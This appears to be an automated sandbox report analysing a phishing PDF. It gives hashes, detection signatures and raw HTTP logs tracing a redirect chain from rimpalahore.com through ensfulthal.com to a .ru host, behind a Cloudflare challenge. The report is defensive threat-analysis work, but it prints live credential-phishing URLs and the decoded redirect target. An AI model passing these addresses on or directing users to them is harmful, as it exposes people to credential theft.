Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cgoaudit Files.pdf

Overview

General Information

Sample name:cgoaudit Files.pdf
Analysis ID:1563841
MD5:29edaf9cbc4a5c604b01f2f1a87c0201
SHA1:0302b045e167fcc79e9bd3b387f329a84d591e70
SHA256:8a3dc520cd7f9819b19f9de9b97b451ff9a377479a62af545dc78ea552174b46
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
HTML page contains hidden javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 6988 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\cgoaudit Files.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6264 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6540 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1572,i,18327643351867772495,3848152203052608152,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rimpalahore.com/odin/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1972,i,16109135660613449894,198606018373725258,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://rimpalahore.com/odin/SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://rimpalahore.com/odin/Joe Sandbox AI: Page contains button: 'Continue' Source: '1.0.pages.csv'
Source: PDF documentJoe Sandbox AI: Page contains button: 'Review Now' Source: 'PDF document'
Source: PDF documentJoe Sandbox AI: PDF document contains QR code
Source: https://rimpalahore.com/odin/HTTP Parser: Base64 decoded: https://1z.ensfulthal.com/mw2hN4k/
Source: https://rimpalahore.com/odin/HTTP Parser: No favicon
Source: https://1z.ensfulthal.com/mw2hN4k/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 52.6.155.20 52.6.155.20
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.6.155.20
Source: global trafficHTTP traffic detected: GET /odin/ HTTP/1.1Host: rimpalahore.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rimpalahore.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rimpalahore.com/odin/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: fe97c538-da5e-4108-829d-bf7bd7076578x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VOvE8RzO5wNHmSm&MD=BhyuRolF HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /mw2hN4k/ HTTP/1.1Host: 1z.ensfulthal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://rimpalahore.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1z.ensfulthal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1z.ensfulthal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1z.ensfulthal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1z.ensfulthal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://1z.ensfulthal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e92ba946dde8cec&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 1z.ensfulthal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1z.ensfulthal.com/mw2hN4k/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inp2RFFzRnR2dTgrazVyTzRtTmNzWEE9PSIsInZhbHVlIjoiRDdNNy9QRUVvWXR1MmJibVhMc1d1cEdxYUtOdDFSUCtXQ1JWNFBDV3RKZjdrMlZlcGVGaUU3QTRGYkNwVjgzbk80V014UHdzdzhBRkloVGtaaE1LVnpqYUU5eFR2WS9zYnN6VURlK3hsa0ZIenkzbFNMNmdIVzVDS3lRbHROKzYiLCJtYWMiOiI0NjJjODE2NTNiNzExOWI2MGQ1ZDMxNmQ0YzIwM2FjYmFlNzlmZWFhNGY0MDYxMDdlMGZmNTYxMWJlOThlZWM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Iis5OUlUK3dGY2tYbkhYcmE2MDJROGc9PSIsInZhbHVlIjoicWZFZ1hXa1ZQR05uZTNmcjVScVFVSmJEaVFZeXZGQnZscHVFeHgrTlBnZGFLK3ZUR0hMUFFFRkFPelFDQ1dJaUZmeW4vNHZXT1d6cm9WN1lEclp6OEFCc2Vta2YxS0h1SitmMkpidDNIY2xpcmh5NlBvNnQrOURoM2hyN1dRZVIiLCJtYWMiOiI5MDExY2U0ZjE5NjA4ZjM3OWQzOWExMjRhYWU1NDVlNGVjNWY1MDE5ZTA4OWNkOTVkZWNiOWUyNDIyOWFlYWNjIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e92ba946dde8cec&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e92ba946dde8cec/1732716915077/hUzfX73lIZ5OJt- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e92ba946dde8cec/1732716915077/hUzfX73lIZ5OJt- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8e92ba946dde8cec/1732716915079/bdcbeab1c83350eb0800e30560e9da0cfa42eeede4ecd68d3e23505d870a16af/339RObj6JSxOmMb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VOvE8RzO5wNHmSm&MD=BhyuRolF HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cqsexwwlxyuecdhcrtjjbsoAZYBxFfQAMRTUSVYOZCJLQOZPLUPCIQKGNSLZZRBCBRDDLGVVIXOUXMGZYCOOSMSKX HTTP/1.1Host: u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://1z.ensfulthal.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://1z.ensfulthal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cqsexwwlxyuecdhcrtjjbsoAZYBxFfQAMRTUSVYOZCJLQOZPLUPCIQKGNSLZZRBCBRDDLGVVIXOUXMGZYCOOSMSKX HTTP/1.1Host: u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_182.6.drString found in binary or memory: <meta name="twitter:image" content="https://www.twitter.com/favicon.ico" /> equals www.twitter.com (Twitter)
Source: chromecache_182.6.drString found in binary or memory: <meta property="og:image" content="https://www.twitter.com/favicon.ico" /> equals www.twitter.com (Twitter)
Source: global trafficDNS traffic detected: DNS query: rimpalahore.com
